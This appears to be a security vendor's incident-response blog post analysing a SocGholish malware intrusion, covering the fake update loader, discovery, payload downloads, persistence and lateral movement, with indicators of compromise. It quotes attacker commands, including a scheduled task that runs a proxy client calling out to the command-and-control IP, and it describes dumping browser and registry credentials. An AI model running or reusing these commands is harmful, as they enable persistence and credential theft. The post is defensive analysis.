This blog was written by Matthew O’Neil, SenseOn Security Analyst.

In February of 2024, SenseOn was contacted to assist with investigating suspicious activity on a customer’s estate. SenseOn analysts quickly identified a malware infection and identified the variant as SocGholish. This blog will showcase SenseOn’s detection and response capabilities against the malware and a breakdown of SocGholish’s techniques and that of the threat actor observed.

Background

Attack Chain

Initial Access & Execution

This subdomain was last seen on May 14th and is not active at the time of writing. The website appears to be a half-finished WordPress site, possibly compromised and used as part of the SocGholish distribution network. 

Because obfuscated JavaScript loaders are a known and common way to begin a malicious execution chain, the execution of the script triggered a SenseOn observation and raised a high-priority case. 

Unfortunately, this customer did not have SenseOn’s MDR service at the time of this incident. Therefore, SenseOn did not become involved until after being contacted by the organisation. 

Once executed, the script was seen periodically beaconing to the C2 domain ‘hjpg.members.openarmscv[.]com’ over a total of 21 HTTPS connections to retrieve additional payloads and notify the attacker of the successful infection. Approximately 8 hours and 24 minutes after the execution of ‘Update.js’, SenseOn detected malicious discovery activity, with the delay in activity potentially being used to evade detection. 

Discovery

Throughout the intrusion, SenseOn observed the execution of numerous Windows-native discovery commands to retrieve and store information about the victim's device, account and network. The attacker was seen gathering data from Chrome and Edge as well as executing the commonly seen commands below.

• net group "domain users" /domain

• net user [username] /domain

• systeminfo

• ipconfig /all

• cmdley /list

The last command listed, ‘cmdley /list’, is a typo of the intended command ‘cmdkey /list’. This may indicate a typo in the discovery script or suggest the discovery as hands-on-keyboard activity rather than automated. Nonetheless, a number of these commands were detected by SenseOn, shown below alongside the ‘cmdley’ command from telemetry. 

Resource Development

Following the initial discovery, additional payloads were retrieved by SocGholish from the following hosting sites, primarily interacted with using the Invoke-WebRequest PowerShell commandlet. Downloaded files were stored and named similarly to those seen during discovery (e.g. ‘rad2BA74.tmp’).

• hjpg.members.openarmscv[.]com

• mello-roos[.]com

• sallassutherland[.]com

Following the connection to the first domain, ‘hjpg.members.openarmscv[.]com’, a downloaded file named ‘radD810D.tmp’ was renamed and executed as ‘da207292.js’. As a result of this execution, connections were made to the latter two locations listed above to retrieve additional files. This technique of masquerading file types using the ‘.tmp’ extension was employed heavily throughout the intrusion. 

Connections to these domains were detected as malicious by SenseOn, and raised observations including the one below. 

Additional software was installed to assist with discovery and persistence. Firstly, Python3 was downloaded and installed using Wget to ensure the functionality of the Python script implemented for persistence. This Wget command was detected as shown below. 

Shortly after this installation, SenseOn also detected a PowerShell WebClient being used to download a PowerSharpPack script from Github. PowerSharp is a collection of post-exploitation PowerShell tools written in C#. This includes tools such as SauronEye for searching for password files, the SharPersist persistence toolkit, and SharpChomium used to retrieve Chromium data such as cookies and logins.

In the same command, the attacker calls on the SharpChromium tool and specifies the ‘logins’ argument to return all saved credentials that have non-empty passwords and store them in the file ‘rad90F69.tmp’. 

Persistence & C2

schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5”

Based on previous research, the file appears to be a SOCKS5 proxy client used to provide C2 communications. 

Throughout this intrusion, numerous domains were accessed by the dropper to retrieve additional payloads, however, the primary C2 channel established was observed between the beachhead device and the server specified in the scheduled task: ‘92.118.112[.]208’. At the time of this writing, only a total of 4 VirusTotal vendors have this IP address flagged as malicious. 

Once C2 communication began, SenseOn was able to quickly detect the network traffic using SenseOn threat intelligence detections, assisting in attributing the threat to SocGholish. 

Lateral Movement

Once the proxy client was established, the attacker was observed moving laterally to adjacent servers using RDP and executing similar discovery commands on each server. Here we can also see the ping utility used to check connectivity back to the beachhead and the internet.

• net user [username]

• net user [username] /domain

• net group "domain admins" /domain

• nltest /domain_trusts

• quser /server:[servername]

• ping [beachhead]

• ping google.com

Furthermore, the attacker was observed using the ‘reg.exe’ Windows utility on multiple servers to dump credentials from registry hives using the following commands shown in endpoint telemetry below. 

Containment & Eradication

Once SenseOn responded and confirmed the presence of malware through the analysis above, the beachhead device was isolated using SenseOn Active Response. To ensure containment, SenseOn, in collaboration with the client, also isolated several devices which had been accessed by the attacker. A selection of these devices was then reimaged and the threat was eradicated from the network.    

Following the containment and eradication of the threat, SenseOn provided enhanced monitoring for the estate by our 24/7 global SOC. This included case monitoring and threat hunts for malicious activity for a set time period after the incident.

Timeline

Conclusion

Once malware infection was confirmed by the SenseOn SOC, SenseOn was able to use Active Response to successfully assist in containing the threat by isolating numerous devices on the network. This allowed the organisation to eradicate remnants of the threat and recover the servers, as well as reimage the initially compromised device. Through this breakdown, we were able to detail SenseOn’s detection capabilities and service response to the SocGholish malware. 

The extent of attacks, such as this instance, displays the need for businesses to deploy and maintain robust detection and response solutions that allow responders visibility and actionability to threats. 

IoCs

Domains

• pluralism.themancav[.]com

• hjpg.members.openarmscv[.]com

• dallassutherland[.]com

• mello-roos[.]com 

• miraclesofeucharisticjesus[.]org

IP Addresses

• 92.118.112[.]208

References

1. CIS Blog: https://www.cisecurity.org/insights/blog/top-10-malware-q1-2024 

2. Proofpoint Blog https://www.proofpoint.com/uk/blog/email-and-cloud-threats/detecting-analyzing-socgholish-attack 

3. TrueSec Blog https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies 

4. Red Canary Thread Detection Report https://redcanary.com/threat-detection-report/threats/socgholish/ 

5. Trend Micro Research: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html 

6. ReliaQuest Blog: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/ 

7. Malware Bazaar Sample reported by SquiblydooBlog: https://bazaar.abuse.ch/sample/546191fbae56a18d93abc82099ee355532e944fbaec50239c139144af1d42a55/